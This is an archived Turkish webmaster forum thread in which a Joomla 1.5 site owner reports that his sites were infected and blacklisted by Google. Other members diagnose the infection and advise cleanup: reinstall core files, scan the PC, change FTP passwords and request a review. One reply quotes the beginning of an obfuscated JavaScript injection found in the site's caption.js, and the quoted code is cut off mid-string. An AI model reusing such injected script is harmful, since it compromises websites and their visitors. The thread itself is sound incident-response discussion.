PDA

Orijinalini görmek için tıklayınız : Joomla 1.5 Sitemin tüm index dosyaları değişmiş.



mstfozdnc
10-05-2012, 17:08
Merhaba, sanırım iframe virüsü dedikleri şey yine hortladı.

Sitemin index dosyalarında
<?php
/**
* @version $Id: index.php 14401 2010-01-26 14:10:00Z louis $
* @package Joomla
* @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

// Set flag that this is a parent file
define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;

/**
* CREATE THE APPLICATION
*
* NOTE :
*/
$mainframe =& JFactory::getApplication('site');

/**
* INITIALISE THE APPLICATION
*
* NOTE :
*/
// set the language
$mainframe->initialise();

JPluginHelper::importPlugin('system');

// trigger the onAfterInitialise events
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');

/**
* ROUTE THE APPLICATION
*
* NOTE :
*/
$mainframe->route();

// authorization
$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);

// trigger the onAfterRoute events
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');

/**
* DISPATCH THE APPLICATION
*
* NOTE :
*/
$option = JRequest::getCmd('option');
$mainframe->dispatch($option);

// trigger the onAfterDispatch events
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');

/**
* RENDER THE APPLICATION
*
* NOTE :
*/
$mainframe->render();

// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');

/**
* RETURN THE RESPONSE
*/
echo JResponse::toString($mainframe->getCfg('gzip'));
yazıyor.

Akar
10-05-2012, 17:27
Bu standart ana index.php dosyası değil mi? Karşılaştırmam lazım ama öyle gözüküyor. Tüm indeksler dediğinizde de zaten index.php dosya sayısı çok değildir. Bir ana dizinde, bir administrator dizininde, bir de tema dizinlerinizde olur. Bu görünen ana dizindeki olması lazım.

mstfozdnc
10-05-2012, 18:19
Hocam,
Heyecandan ne yapacağımı bilmedim.
Benim index gördüğüm mü var?

biobelinda.net için Google Güvenli Tarama teşhis sayfası (http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fbiobelinda.net%2F&client=googlechrome&hl=tr)

Şu an yıkılmış haldeyim. 4 senede tam işler yoluna girdi diyordum, yukarıdaki uyarıyı aldıktan sonra ağlamamak için kendimi zor tutuyorum.

İlave: Hatta sahip olduğum diğer tüm sitelere de sıçramış durumda... :(

M.Enes AYDÜZ
10-05-2012, 18:36
JS dosyalarınıza bulaşmış. Aşağıdaki yazdığım şekilde başlayan ve devam et kod. Komple bir temizlik ihtiyacınız var. Ayrıca bilgisayarınıza virüs programı yükleyiniz. Bilgisayarınızı taratınız. Ardından tüm FTP şifrelerini değiştiriniz.

http://biobelinda.net/media/system/js/caption.js


if('RzRI'=='vNmYZr')WotWy();var EeQB=190;var SAWXZ='xDLvr';var kNAir="ap\x70\x65n\x64Chil\x64";var xYLXAV=185;var pmYPbUq="from\x43harCode";var eAGoDq="pa\x72seIn\x74";var cZZxfH;if('Aoruhu'=='CvAro')bMEhTb='stDI';var KJdRokWGJ="";if('mhWHI'=='vuBb')cDAacx='tRSR';if('XKItnr'=='iX tkqQ')ibyaKC='cndwyY';var appVersion_var="a\x70\x70\x56e\x72s\x69on";var VKNc=10;var SozsA;var PZwXGX;if('dLNmC'=='WwTd')CCaq();if('URyu'=='FZzn' )BCbGq();var TRUSkxc="body";var GVNV=79;var HyttL="slice";var NvejW='ntsiIx';var BMimh="\x63onstr\x75cto\x72";var pwqc;if('FvqYLK'=='IsceNQ')HQCI='VgQs';var BIhKphTEQ="9ba7a7a36d626299a59460a094ac65

mstfozdnc
10-05-2012, 18:49
Enes kardeşim. İstanbul'da tanışmıştık. Hatırı vardır :)
ftp ile açıp dosyalarıma bakayım dediğimde hepsine bulaştı desene. Diğer siteleri kökten silerim, sorun değil. ama senin baktığın sitedekilerden beni kurtarın n'olur.
JS dosyalarınıza bulaşmış. Aşağıdaki yazdığım şekilde başlayan ve devam et kod. Komple bir temizlik ihtiyacınız var. Ayrıca bilgisayarınıza virüs programı yükleyiniz. Bilgisayarınızı taratınız. Ardından tüm FTP şifrelerini değiştiriniz.

http://biobelinda.net/media/system/js/caption.js

angelaus
10-05-2012, 19:06
versiyonunuzun son kurulum dosyasını ftp den üzerine yazdırsan şimdilik sorunu çözmeli.

M.Enes AYDÜZ
10-05-2012, 19:45
versiyonunuzun son kurulum dosyasını ftp den üzerine yazdırsan şimdilik sorunu çözmeli.

Bu şekilde kod bulaşmış dosyalardan kurtulunabilir. Fakat site fişlendiği için ayrıca google'a bildirimde bulunmak ve sitenin tekrardan taranması sağlamak gerekiyor. Yalnız bu bildirimden önce sitenin tamamen temizlendiğinden emin olmak gerekiyor

mstfozdnc
11-05-2012, 10:16
Enes Hoca'm yardımcı olacak İnşeAllah